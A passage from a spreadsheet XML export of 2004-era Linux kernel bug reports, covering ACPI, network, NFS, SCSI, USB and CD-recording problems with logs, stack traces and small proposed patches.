    <t>Distribution: Hardware Environment: Itanium2 (Tiger4) Software Environment: Tiger4's DSDT with my change Problem Description: Linux doesn't seem to handle field unit correctly. For example, when I try the following method, Local0 has a wrong value '0x3FFFFF', while my expectation is '0x3FFF' /* * Note: Region ABCD is filled with 0xF */ OperationRegion (ABCD, SystemMemory, 0x100000, 0x1000) Field (ABCD, AnyAcc, NoLock, WriteAsZeros) { AAAA, 14, BBBB, 1 } Method (TEST, 0, NotSerialized) { Store (AAAA, Local0) Store (Local0, Debug) } Steps to reproduce: 1. Edit your DSDT to add above-mentioned method. 2. Evaluate the above-mentioned method. (Please check the values in region ABCD before evaluate the method.)</t>
  </si>
  <si>
    <t>tg3 fails with 'HW autoneg failed'</t>
  </si>
  <si>
    <t>2.6.8-rc4</t>
  </si>
  <si>
    <t>2004-08-11 08:23 UTC</t>
  </si>
  <si>
    <t>2004-09-20 11:23 UTC</t>
  </si>
  <si>
    <t>Distribution: any Hardware Environment: JS20 (ppc64) 0000:11:01.1 Ethernet controller: Broadcom Corporation NetXtreme BCM5704S Gigabit Ethernet (rev 03) Software Environment: Vanilla 2.6.8-rc4 kernel gcc version 3.3.3 Problem Description: Network communications do not work, but the interface reports itself as being up in ifconfig. The error 'tg3: eth1: HW autoneg failed !' happens everytime you try to bring the interface up (either initially, or ifconfig eth1 down/ifconfig eth1 up). Here are the other related dmesg entries: eth1: Tigon3 [partno(none) rev 2003 PHY(serdes)] (PCIX:133MHz:64-bit) 10/100/1000BaseT Ethernet 00:0d:60:1e:80:53 eth1: HostTXDS[1] RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] Split[0] WireSpeed[1] TSOcap[1] Steps to reproduce: Boot.</t>
  </si>
  <si>
    <t>NFS server hangs because of read access that is not multiple of PAGE_SIZE</t>
  </si>
  <si>
    <t>2004-08-11 09:40 UTC</t>
  </si>
  <si>
    <t>Maurice van der Pot</t>
  </si>
  <si>
    <t>2005-07-09 12:29 UTC</t>
  </si>
  <si>
    <t>For linux-2.6.8-rc4 a 'len' variable was made unsigned in the NFS server. That causes a lockup in the nfssvc_decode_readargs and nfs3svc_decode_readargs functions in case the length of a read is not a multiple of PAGE_SIZE. The following patch should fix that problem. (For some reason I was unable to get patch to apply it, but it is simple enough to do manually. Haven't tracked down the reason for this yet.)</t>
  </si>
  <si>
    <t>MIPS JAZZ  jazz-ksyms.c - build system broken</t>
  </si>
  <si>
    <t>2004-08-12 07:31 UTC</t>
  </si>
  <si>
    <t>2004-08-19 23:44 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: MIPS JAZZ Software Environment: Problem Description: Impossible to build MIPS JAZZ kernel. The "jazz-ksyms.c" contains undefined symbols. Steps to reproduce: Make JAZZ MIPS kernel: make[1]: Entering directory `/linux/linux-2.4.27/arch/mips/jazz' ... ... mipsel-linux-gcc -D__KERNEL__ -I/linux/linux-2.4.27/include -Wall -Wstrict- prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame- pointer -I /linux/linux-2.4.27/include/asm/gcc -G 0 -mno-abicalls -fno-pic - pipe -finline-limit=100000 -march=r4600 -mips2 -Wa,-32 -Wa,-march=r4600 -Wa,- mips3 -Wa,--trap -nostdinc -iwithprefix include - DKBUILD_BASENAME=jazz_ksyms -c -o jazz-ksyms.o jazz-ksyms.c jazz-ksyms.c:14: parse error before `this_object_must_be_defined_as_export_objs_in_the_Makefile' jazz-ksyms.c:14: warning: type defaults to `int' in declaration of `this_object_must_be_defined_as_export_objs_in_the_Makefile' jazz-ksyms.c:14: warning: data definition has no type or storage class jazz-ksyms.c:15: parse error before `this_object_must_be_defined_as_export_objs_in_the_Makefile' jazz-ksyms.c:15: warning: type defaults to `int' in declaration of `this_object_must_be_defined_as_export_objs_in_the_Makefile' jazz-ksyms.c:15: warning: data definition has no type or storage class jazz-ksyms.c:16: parse error before `this_object_must_be_defined_as_export_objs_in_the_Makefile' jazz-ksyms.c:16: warning: type defaults to `int' in declaration of `this_object_must_be_defined_as_export_objs_in_the_Makefile' jazz-ksyms.c:16: warning: data definition has no type or storage class make[1]: *** [jazz-ksyms.o] Error 1 make[1]: Leaving directory `/linux/linux-2.4.27/arch/mips/jazz'</t>
  </si>
  <si>
    <t>acpi_other</t>
  </si>
  <si>
    <t>v4l-dvb</t>
  </si>
  <si>
    <t>dvb-frontend</t>
  </si>
  <si>
    <t>2.6.8</t>
  </si>
  <si>
    <t>Mauro Carvalho Chehab</t>
  </si>
  <si>
    <t>Debug: sleeping function called from invalid context at mm/slab.c:1989</t>
  </si>
  <si>
    <t>2004-08-15 00:02 UTC</t>
  </si>
  <si>
    <t>2004-08-24 08:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Hardware Environment: output of lspci: 00:00.0 Host bridge: ATI Technologies Inc AGP Bridge [IGP 320M] (rev 13) 00:01.0 PCI bridge: ATI Technologies Inc PCI Bridge [IGP 320M] (rev 01) 00:02.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:07.0 ISA bridge: ALi Corporation M1533 PCI to ISA Bridge [Aladdin IV] 00:08.0 Multimedia audio controller: ALi Corporation M5451 PCI AC-Link Controller Audio Device (rev 02) 00:0a.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 02) 00:0b.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 20) 00:0c.0 Communication controller: Conexant HSF 56k HSFi Modem (rev 01) 00:0f.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:10.0 IDE interface: ALi Corporation M5229 IDE (rev c4) 00:11.0 Bridge: ALi Corporation M7101 PMU 01:05.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility U1 Software Environment: gcc version 3.3.4 Problem Description: When i connet my motorola cellular phone to the usb port and start a GPRS session, i start getting my syslog filled with: Aug 15 08:38:57 dali kernel: Debug: sleeping function called from invalid contex t at mm/slab.c:1989 Aug 15 08:38:57 dali kernel: in_atomic():1, irqs_disabled():0 Aug 15 08:38:57 dali kernel: [&lt;c0106af7&gt;] dump_stack+0x17/0x20 Aug 15 08:38:57 dali kernel: [&lt;c011a45f&gt;] __might_sleep+0x9f/0xb0 Aug 15 08:38:57 dali kernel: [&lt;c013ba39&gt;] __kmalloc+0x89/0xa0 Aug 15 08:38:57 dali kernel: [&lt;d0d4bfb4&gt;] ohci_urb_enqueue+0xb4/0x290 [ohci_hcd ] Aug 15 08:38:57 dali kernel: [&lt;c02bfce5&gt;] hcd_submit_urb+0xf5/0x180 Aug 15 08:38:57 dali kernel: [&lt;c02c05d5&gt;] usb_submit_urb+0x1d5/0x250 Aug 15 08:38:57 dali kernel: [&lt;d0df5605&gt;] acm_tty_write+0xb5/0x100 [cdc_acm] Aug 15 08:38:57 dali kernel: [&lt;d0e0abc2&gt;] ppp_async_push+0xd2/0x150 [ppp_async] Aug 15 08:38:57 dali kernel: [&lt;d0e0aae1&gt;] ppp_async_send+0x41/0x50 [ppp_async] Aug 15 08:38:57 dali kernel: [&lt;d0e134aa&gt;] ppp_push+0x7a/0xd0 [ppp_generic] Aug 15 08:38:57 dali kernel: [&lt;d0e131a7&gt;] ppp_send_frame+0x247/0x4d0 [ppp_gener ic] Aug 15 08:38:57 dali kernel: [&lt;d0e12f0c&gt;] ppp_xmit_process+0x4c/0xa0 [ppp_gener ic] Aug 15 08:38:57 dali kernel: [&lt;d0e12c3c&gt;] ppp_start_xmit+0xdc/0x230 [ppp_generi c] Aug 15 08:38:57 dali kernel: [&lt;c0334dbe&gt;] qdisc_restart+0x4e/0xe0 Aug 15 08:38:57 dali kernel: [&lt;c0329e4e&gt;] dev_queue_xmit+0x18e/0x220 Aug 15 08:38:57 dali kernel: [&lt;c0343542&gt;] ip_finish_output2+0xe2/0x1e0 Aug 15 08:38:57 dali kernel: [&lt;c033266b&gt;] nf_hook_slow+0xcb/0x120 Aug 15 08:38:57 dali kernel: [&lt;c0341221&gt;] ip_finish_output+0x41/0x50 Aug 15 08:38:57 dali kernel: [&lt;c0343445&gt;] dst_output+0x15/0x30 Aug 15 08:38:57 dali kernel: [&lt;c033266b&gt;] nf_hook_slow+0xcb/0x120 Aug 15 08:38:57 dali kernel: [&lt;c0341852&gt;] ip_queue_xmit+0x452/0x550 Aug 15 08:38:57 dali kernel: [&lt;c035082f&gt;] tcp_transmit_skb+0x3ef/0x670 Aug 15 08:38:57 dali kernel: [&lt;c035128b&gt;] tcp_write_xmit+0x15b/0x2b0 Aug 15 08:38:57 dali kernel: [&lt;c034ea33&gt;] __tcp_data_snd_check+0xc3/0xe0 Aug 15 08:38:57 dali kernel: [&lt;c034f32a&gt;] tcp_rcv_established+0x54a/0x750 Aug 15 08:38:57 dali kernel: [&lt;c035729a&gt;] tcp_v4_do_rcv+0xea/0xf0 Aug 15 08:38:57 dali kernel: [&lt;c0357873&gt;] tcp_v4_rcv+0x5d3/0x7e0 Aug 15 08:38:57 dali kernel: [&lt;c033eb94&gt;] ip_local_deliver_finish+0xd4/0x1a0 Aug 15 08:38:57 dali kernel: [&lt;c033266b&gt;] nf_hook_slow+0xcb/0x120 Aug 15 08:38:57 dali kernel: [&lt;c033e8a1&gt;] ip_local_deliver+0x51/0x60 Aug 15 08:38:57 dali kernel: [&lt;c033ee38&gt;] ip_rcv_finish+0x1d8/0x260 Aug 15 08:38:57 dali kernel: [&lt;c033266b&gt;] nf_hook_slow+0xcb/0x120 Aug 15 08:38:57 dali kernel: [&lt;c033ea19&gt;] ip_rcv+0x169/0x210 Aug 15 08:38:57 dali kernel: [&lt;c032a32d&gt;] netif_receive_skb+0x1ad/0x210 Aug 15 08:38:57 dali kernel: [&lt;c032a40e&gt;] process_backlog+0x7e/0x100 Aug 15 08:38:57 dali kernel: [&lt;c032a4f5&gt;] net_rx_action+0x65/0xe0 Aug 15 08:38:57 dali kernel: [&lt;c011f87a&gt;] __do_softirq+0x7a/0x80 Aug 15 08:38:57 dali kernel: [&lt;c011f8ac&gt;] do_softirq+0x2c/0x30 Aug 15 08:38:57 dali kernel: [&lt;c010801f&gt;] do_IRQ+0xcf/0xf0 Aug 15 08:38:57 dali kernel: [&lt;c01066a0&gt;] common_interrupt+0x18/0x20 Aug 15 08:38:57 dali kernel: [&lt;c01040d4&gt;] cpu_idle+0x34/0x40 Aug 15 08:38:57 dali kernel: [&lt;c04b673a&gt;] start_kernel+0x15a/0x1a0 Aug 15 08:38:57 dali kernel: [&lt;c010019f&gt;] 0xc010019f and after some time, the computer hangs. the problem does not exist in kernel version 2.6.7 Steps to reproduce:</t>
  </si>
  <si>
    <t>ODD transfer in DATA IN phase - inquiry failed</t>
  </si>
  <si>
    <t>2.6.5-7.104-smp</t>
  </si>
  <si>
    <t>2004-08-15 11:25 UTC</t>
  </si>
  <si>
    <t>Robert Strickler</t>
  </si>
  <si>
    <t>2006-08-25 04:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Suse 9.1 AMD_64 Hardware Environment: Dual Opteron 1 FUJITSU Model: MAP3367NP 2 WDIGTL Model: WDE4550 ULTRA2 Software Environment: boot Problem Description: In scsi_scan.c around line 600 - if (addlen &gt; 255) - addlen = 255; + if (addlen &gt; 254) + addlen = 254; As reported in the messages, 255 is an ODD value, reducing it to an almost equivalent even value should resolve the issue and is unlikely to break existing behaviour. I haven't read the scsi specs in many years, but I would think that with such an explicit error message, that thre is something there with a "SHOULD" if not a "MUST" regarding even sized buffer lengths. It does seem odd that the first WD complains, but the second, which should be identical, is not. This drive is on the second controller of the card. That shouldn't affect the validity of the fix, but I thouhjt it merited a comment. From boot.msg: ------------------------------------- &lt;5&gt;SCSI subsystem initialized &lt;6&gt;sym0: &lt;875&gt; rev 0x37 at pci 0000:00:07.0 irq 18 &lt;4&gt;sym0: Symbios NVRAM, ID 7, Fast-20, SE, parity checking &lt;4&gt;sym0: open drain IRQ line driver, using on-chip SRAM &lt;4&gt;sym0: using LOAD/STORE-based firmware. &lt;5&gt;sym0: SCSI BUS has been reset. &lt;6&gt;scsi0 : sym-2.1.18i &lt;5&gt; Vendor: FUJITSU Model: MAP3367NP Rev: 0108 &lt;5&gt; Type: Direct-Access ANSI SCSI revision: 03 &lt;6&gt;sym0:0:0: tagged command queuing enabled, command queue depth 16. &lt;6&gt;sym0:0: FAST-20 WIDE SCSI 40.0 MB/s ST (50.0 ns, offset 16) &lt;5&gt;SCSI device sda: 71775284 512-byte hdwr sectors (36749 MB) &lt;5&gt;SCSI device sda: drive cache: write back &lt;6&gt; sda: sda1 sda2 sda3 &lt;5&gt;Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 &lt;6&gt;sym0:4: FAST-20 WIDE SCSI 40.0 MB/s ST (50.0 ns, offset 16) &lt;4&gt;sym0:4:0:ODD transfer in DATA IN phase. &lt;4&gt;sym0:4:0:COMMAND FAILED (87 0 10). &lt;4&gt;sym0:4:0:ODD transfer in DATA IN phase. &lt;4&gt;sym0:4:0:COMMAND FAILED (87 0 10). &lt;4&gt;sym0:4:0:ODD transfer in DATA IN phase. &lt;4&gt;sym0:4:0:COMMAND FAILED (87 0 10). &lt;6&gt;scsi scan: 255 byte inquiry failed with code 458752. Consider BLIST_INQUIRY_36 for this device &lt;5&gt; Vendor: WDIGTL Model: WDE4550 ULTRA2 Rev: 1.22 &lt;5&gt; Type: Direct-Access ANSI SCSI revision: 02 &lt;6&gt;sym0:4:0: tagged command queuing enabled, command queue depth 16. &lt;5&gt;SCSI device sdb: 8890000 512-byte hdwr sectors (4552 MB) &lt;5&gt;SCSI device sdb: drive cache: write back &lt;6&gt; sdb: sdb1 &lt;5&gt;Attached scsi disk sdb at scsi0, channel 0, id 4, lun 0 &lt;6&gt;sym1: &lt;875&gt; rev 0x37 at pci 0000:00:07.1 irq 19 &lt;4&gt;sym1: Symbios NVRAM, ID 7, Fast-20, SE, parity checking &lt;4&gt;sym1: open drain IRQ line driver, using on-chip SRAM &lt;4&gt;sym1: using LOAD/STORE-based firmware. &lt;5&gt;sym1: SCSI BUS has been reset. &lt;6&gt;scsi1 : sym-2.1.18i &lt;6&gt;sym1:0: FAST-20 WIDE SCSI 40.0 MB/s ST (50.0 ns, offset 16) &lt;4&gt;sym1:0:0:ODD transfer in DATA IN phase. &lt;4&gt;sym1:0:0:COMMAND FAILED (87 0 10). &lt;4&gt;sym1:0:0:ODD transfer in DATA IN phase. &lt;4&gt;sym1:0:0:COMMAND FAILED (87 0 10). &lt;4&gt;sym1:0:0:ODD transfer in DATA IN phase. &lt;4&gt;sym1:0:0:COMMAND FAILED (87 0 10). &lt;6&gt;scsi scan: 255 byte inquiry failed with code 458752. Consider BLIST_INQUIRY_36 for this device &lt;5&gt; Vendor: WDIGTL Model: WDE4550 ULTRA2 Rev: 1.22 &lt;5&gt; Type: Direct-Access ANSI SCSI revision: 02 &lt;6&gt;sym1:0:0: tagged command queuing enabled, command queue depth 16. &lt;5&gt;SCSI device sdc: 8890000 512-byte hdwr sectors (4552 MB) &lt;5&gt;SCSI device sdc: drive cache: write through &lt;6&gt; sdc: sdc1 &lt;5&gt;Attached scsi disk sdc at scsi1, channel 0, id 0, lun 0 Steps to reproduce: Should reproduce with any any similarly picky controller.</t>
  </si>
  <si>
    <t>Superfloppy formatted USB Storage devices cause scsi errors</t>
  </si>
  <si>
    <t>2.6.8.1</t>
  </si>
  <si>
    <t>2004-08-16 07:45 UTC</t>
  </si>
  <si>
    <t>Iacopo Spalletti</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Problem Description: Inserting a superfloppy formatted USB Storage device causes scsi errors on plugging the device in USB socket Don't know if it depends on scsi or usb modules Sample: Aug 16 16:34:57 zero kernel: usb 1-3: new full speed USB device using address 2 Aug 16 16:34:57 zero kernel: scsi2 : SCSI emulation for USB Mass Storage devices Aug 16 16:34:57 zero kernel: Vendor: Model: 300_CAMERA Rev: 1.00 Aug 16 16:34:57 zero kernel: Type: Direct-Access ANSI SCSI revision: 02 Aug 16 16:34:57 zero usb.agent[14269]: usb-storage: already loaded Aug 16 16:34:58 zero kernel: SCSI device sda: 121856 512-byte hdwr sectors (62 MB) Aug 16 16:34:58 zero kernel: sda: assuming Write Enabled Aug 16 16:34:58 zero kernel: sda: assuming drive cache: write through Aug 16 16:34:58 zero kernel: sda:SCSI error : &lt;2 0 0 0&gt; return code = 0x10070000 Aug 16 16:34:58 zero kernel: end_request: I/O error, dev sda, sector 0 Aug 16 16:34:58 zero kernel: Buffer I/O error on device sda, logical block 0 Aug 16 16:34:58 zero kernel: SCSI error : &lt;2 0 0 0&gt; return code = 0x10070000 Aug 16 16:34:58 zero kernel: end_request: I/O error, dev sda, sector 0 Aug 16 16:34:58 zero kernel: Buffer I/O error on device sda, logical block 0 Aug 16 16:34:58 zero kernel: unable to read partition table Aug 16 16:34:58 zero kernel: Attached scsi removable disk sda at scsi2, channel 0, id 0, lun 0 Aug 16 16:34:58 zero kernel: USB Mass Storage device found at 2 Steps to reproduce: Plug a superfloppy formatted usb storage device in usb socket</t>
  </si>
  <si>
    <t>Race condition in thermal module, with memory leak fix</t>
  </si>
  <si>
    <t>2004-08-18 02:27 UTC</t>
  </si>
  <si>
    <t>2004-11-04 13:47 UTC</t>
  </si>
  <si>
    <t>Problem Description: Current acpi thermal driver doesn't care about pending task when deleteing timer. The acpi_thermal_check() will still be called by pending task and may set up another timer for it, even if thermal module has been removed. When remove thermal module, kfree(tz) should be called. These issues are found by Li, Shaohua.</t>
  </si>
  <si>
    <t>Power down blanks screen but no power off unless no LAPIC - Lattitude D600</t>
  </si>
  <si>
    <t>2004-08-18 15:57 UTC</t>
  </si>
  <si>
    <t>2004-11-06 01:19 UTC</t>
  </si>
  <si>
    <t>1619 1901 3532</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Dell Latitude D600 Software Environment: Gentoo Problem Description: shutdown -h now does stop every service, but the actual power off isn't performed. Sometimes the screen blanks (but the power led stays on), and sometimes everything stops at the console line: Power down. Kernel 2.6.7 and earlier doesn't have this issue (i used same config file). I tried the ACPI patch for 2.8.6.1 also, but that didn't fix the problem.</t>
  </si>
  <si>
    <t>ac module not being notified of power status change</t>
  </si>
  <si>
    <t>2004-08-19 01:26 UTC</t>
  </si>
  <si>
    <t>Christian Lupien</t>
  </si>
  <si>
    <t>2006-07-05 17:54 UTC</t>
  </si>
  <si>
    <t>Vladimir Lebedev</t>
  </si>
  <si>
    <t>5305 5362</t>
  </si>
  <si>
    <t>Distribution: Fedora-Core-2 Hardware Environment: Gateway Laptop Solo 9550 Software Environment: official 2.6.7 kernel + swsusp2 + acpi-20040326 Problem Description: On my laptop, changes in the ac status is not reported. No event is produced. The ac status is read properly, and when read produces the proper change (lcd light intensity changed according to ac status). I tracked down and fixed the problem: My dsdt uses Notify (\_SB.ACAD, 0x00) to notify the os of AC power status changes. The current notify handler (acpi_ev_queue_notify_request in events/evmisc.c) use the notify value to decide upon an device or system event handler (. Now the AC handler is a device but because of the notify value of 0 (bus check) it will not be called. Even if it was called it only handles notify values of 0x80. A fix for this would be to chnage my dsdt to use Notify (\_SB.ACAD, 0x80) instead. But I found another way by modifying the ac.c module. I register the handler for system and device and habdle the bus_check value. This might be usefull to others in case other peoples dsdt have a similar problem. I don't know if this is a problem seen in many dsdt, but this should fix this type of problems and I don't think it will have any side effect. Here is the patch: --- ac.c.orig 2004-08-15 14:34:03.000000000 -0400 +++ ac.c 2004-08-15 14:37:43.000000000 -0400 @@ -219,6 +219,7 @@ switch (event) { case ACPI_AC_NOTIFY_STATUS: + case ACPI_NOTIFY_BUS_CHECK: acpi_ac_get_state(ac); acpi_bus_generate_event(device, event, (u32) ac-&gt;state); break; @@ -272,6 +273,15 @@ goto end; } + status = acpi_install_notify_handler(ac-&gt;handle, + ACPI_SYSTEM_NOTIFY, acpi_ac_notify, ac); + if (ACPI_FAILURE(status)) { + ACPI_DEBUG_PRINT((ACPI_DB_ERROR, + "Error installing system notify handler\n")); + result = -ENODEV; + goto end; + } + printk(KERN_INFO PREFIX "%s [%s] (%s)\n", acpi_device_name(device), acpi_device_bid(device), ac-&gt;state?"on-line":"off-line"); @@ -307,6 +317,12 @@ ACPI_DEBUG_PRINT((ACPI_DB_ERROR, "Error removing notify handler\n")); + status = acpi_remove_notify_handler(ac-&gt;handle, + ACPI_SYSTEM_NOTIFY, acpi_ac_notify); + if (ACPI_FAILURE(status)) + ACPI_DEBUG_PRINT((ACPI_DB_ERROR, + "Error removing system notify handler\n")); + acpi_ac_remove_fs(device); kfree(ac);</t>
  </si>
  <si>
    <t>kernel init/setup parameters with double quotes don't work.</t>
  </si>
  <si>
    <t>2004-08-19 01:57 UTC</t>
  </si>
  <si>
    <t>2004-11-04 13:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora core 2 Hardware Environment: Gateway laptop Solo 9550 Software Environment: kernel 2.6.7 + swsusp2 patch + acpi patch Problem Description: I was trying to use the acpi_os_name="Microsoft Windows NT" kernel parameter but it was not being used. I tracked down the problem to an interaction between the parser in kernel/params.c which first parses the options. It skips double quotes and removes the = sign. But since acpi_os_name= is an 'obsolete' style parameter eventually unknown_bootoption (in init/main.c) gets called with param pointing to acpi_os_name (no =) and val points to the M of Microsoft... Before calling obsolete_checksetup(param) which should do the job, it needs to undo what the previous parser did but it is not taking account of the presence of the quote (so the = is not added at the correct place and the option is not dectected: "acpi_os_name" != "acpi_os_name=") Here is a patch that fices the problem for me: --- init/main.c.orig 2004-08-19 04:42:43.714880960 -0400 +++ init/main.c 2004-08-19 04:43:17.455751568 -0400 @@ -265,8 +265,10 @@ static int __init unknown_bootoption(char *param, char *val) { /* Change NUL term back to "=", to make "param" the whole string. */ - if (val) - val[-1] = '='; + if (val) { + if (val[-1] == '"') val[-2] = '='; + else val[-1] = '='; + } /* Handle obsolete-style parameters */ if (obsolete_checksetup(param))</t>
  </si>
  <si>
    <t>Damir Perisa</t>
  </si>
  <si>
    <t>Recording Audio CDs with kernel 2.6.8.1 still does not work</t>
  </si>
  <si>
    <t>2004-08-24 05:49 UTC</t>
  </si>
  <si>
    <t>Ben Duncan</t>
  </si>
  <si>
    <t>2006-01-05 18:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.0 Hardware Environment: AMD nForce2 and Pentium 4 Brookdale Software Environment: cdrecord - latest version. Problem Description: When recording Audio CD's with cdrecord the output produced is of an alien sound. The best way to describe it would be like the sound that a modem makes. The tracks are recorded at the correct length, and cd play programs show the correct artist/album. This has been reproduced on 2 separate machine types: AMD XP with nForce2 chipset Intel P4 with the 82845G/GL Brookdale-G/GE/PE chipset. Both machines are nearly mechanically identical. Both have a single ATA 100 IDE disk on ide0 Primary. Both have 2 CD's on ide1. The ide1 primaries are a CD-ROm/16X DVD Player and the secondarys are CD-RW 52x52x52. I can boot into the Slackware stock 2.4.27 kernel and re-run the cdrecord command and it will burn correctly. I have applied the 2.6.8.1 patch for audio memory leak (see item 8.0 for specifics). Steps to reproduce: cdrecord -v speed=8 dev=ATAPI:0,1,0 -audio track* [3.] Applies to: CD/RW, kernel, ATAPI [4.] Kernel version (from /proc/version): AMD System; Linux version 2.6.8.1 (root@desktop) (gcc version 3.3.4) #4 Sat Aug 21 09:47:27 CDT 2004 Intel System: Linux version 2.6.8.1 (root@ottnlee) (gcc version 3.3.4) #1 Fri Aug 20 14:16:55 CDT 2004 [5.] No oops. [6.] cdrecord -v speed=8 dev=ATAPI:0,1,0 -audio track* [7.] Environment: AMD machine: Slackware 10.0 Cdrecord 2.00.3 (i686-pc-linux-gnu) i Copyright (C) 1995-2002 Jorg Schilling Intel machine: Slackware 10.0 Cdrecord 2.00.3 (i686-pc-linux-gnu) i Copyright (C) 1995-2002 Jorg Schilling [7.1.] Software: AMD Machine: Linux desktop 2.6.8.1 #4 Sat Aug 21 09:47:27 CDT 2004 i686 unknown unknown GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.15.90.0.3 util-linux 2.12a mount 2.12a module-init-tools 3.0 e2fsprogs 1.35 PPP 2.4.2 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Linux C++ Library 5.0.6 Procps 3.2.1 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded uhci_hcd ohci_hcd ehci_hcd usbcore shpchp pciehp pci_hotplug nvidia evdev ide_scsi scsi_mod gen rtc Intel machine: Linux ottnlee 2.6.8.1 #1 Fri Aug 20 14:16:55 CDT 2004 i686 unknown unknown GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.15.90.0.3 util-linux 2.12a mount 2.12a module-init-tools 3.0 e2fsprogs 1.35 PPP 2.4.2 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Linux C++ Library 5.0.6 Procps 3.2.1 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded snd_pcm_oss snd_mixer_oss ohci_hcd i intel_agp uhci_hcd ehci_hcd usbcore i shpchp pciehp pci_hotplug i8xx_tco i snd_intel8x0 snd_ac97_codec snd_pcm i snd_timer snd_page_alloc gameport i snd_mpu401_uart snd_rawmidi snd_seq_device snd nvidia 8139too ide_scsi genrtc [7.2.] Processor information AMD machine: processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 8 model name : AMD Athlon(tm) XP 2600+ stepping : 1 cpu MHz : 2079.578 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 4120.57 Intel machine: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 2.80GHz stepping : 9 cpu MHz : 2793.242 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid bogomips : 5537.79 [7.3.] Module information (from /proc/modules): AMD Machine: uhci_hcd 32784 0 - Live 0xf8ad8000 ohci_hcd 21636 0 - Live 0xf8a9f000 ehci_hcd 31364 0 - Live 0xf8a96000 usbcore 119268 5 uhci_hcd,ohci_hcd,ehci_hcd, Live 0xf8ab9000 shpchp 101292 0 - Live 0xf8a5e000 pciehp 97836 0 - Live 0xf8a7d000 pci_hotplug 12164 2 shpchp,pciehp, Live 0xf8a3a000 nvidia 4821268 0 - Live 0xf8f52000 evdev 9536 0 - Live 0xf8a2d000 ide_scsi 17476 0 - Live 0xf8a34000 scsi_mod 84032 1 ide_scsi, Live 0xf8a48000 genrtc 9844 0 - Live 0xf8a29000snd_pcm_oss 53928 0 - Live 0xf8a79000 Intel Machine: snd_mixer_oss 20352 1 snd_pcm_oss, Live 0xf8a62000 ohci_hcd 21508 0 - Live 0xf899c000 intel_agp 22432 1 - Live 0xf8a22000 uhci_hcd 32272 0 - Live 0xf8a19000 ehci_hcd 31108 0 - Live 0xf8a10000 usbcore 116836 5 ohci_hcd,uhci_hcd,ehci_hcd, Live 0xf8a33000 shpchp 100204 0 - Live 0xf89d8000 pciehp 96876 0 - Live 0xf89f7000 pci_hotplug 34096 2 shpchp,pciehp, Live 0xf89a3000 i8xx_tco 7440 0 - Live 0xf8994000 snd_intel8x0 35884 0 - Live 0xf896f000 snd_ac97_codec 68484 1 snd_intel8x0, Live 0xf89c6000 snd_pcm 96392 2 snd_pcm_oss,snd_intel8x0, Live 0xf89ad000 snd_timer 25860 1 snd_pcm, Live 0xf8988000 snd_page_alloc 11912 2 snd_intel8x0,snd_pcm, Live 0xf8959000 gameport 4864 1 snd_intel8x0, Live 0xf8956000 snd_mpu401_uart 8064 1 snd_intel8x0, Live 0xf894d000 snd_rawmidi 25380 1 snd_mpu401_uart, Live 0xf8967000 snd_seq_device 8712 1 snd_rawmidi, Live 0xf8949000 snd 55140 9 snd_pcm_oss,snd_mixer_oss,snd_intel8x0,snd_ac97_codec,snd_pcm, snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device, Live 0xf8979000 nvidia 4821716 0 - Live 0xf8e5b000 8139too 25344 0 - Live 0xf895f000 ide_scsi 17284 0 - Live 0xf8950000 genrtc 9972 0 - Live 0xf8945000 [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) AMD Machine: IO-PORTS: 0000-001f : dma1 0020-0021 : pic1 0040-005f : timer 0060-006f : keyboard 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 02f8-02ff : serial 0376-0376 : ide1 0378-037a : parport0 037b-037f : parport0 03c0-03df : vga+ 03f6-03f6 : ide0 03f8-03ff : serial 0cf8-0cff : PCI conf1 5000-5007 : nForce2 SMBus 5040-5047 : nForce2 SMBus c000-dfff : PCI Bus #01 c000-c007 : 0000:01:07.0 c000-c007 : ide2 c400-c403 : 0000:01:07.0 c402-c402 : ide2 c800-c807 : 0000:01:07.0 cc00-cc03 : 0000:01:07.0 d000-d00f : 0000:01:07.0 d000-d007 : ide2 d008-d00f : ide3 e000-e007 : 0000:00:04.0 e000-e007 : forcedeth e400-e4ff : 0000:00:06.0 e800-e87f : 0000:00:06.0 e800-e83f : NVidia nForce2 - Controller ec00-ec1f : 0000:00:01.1 f000-f00f : 0000:00:09.0 f000-f007 : ide0 f008-f00f : ide1 IOMEM: 00000000-0009f7ff : System RAM 0009f800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cefff : Video ROM 000d0000-000d17ff : Adapter ROM 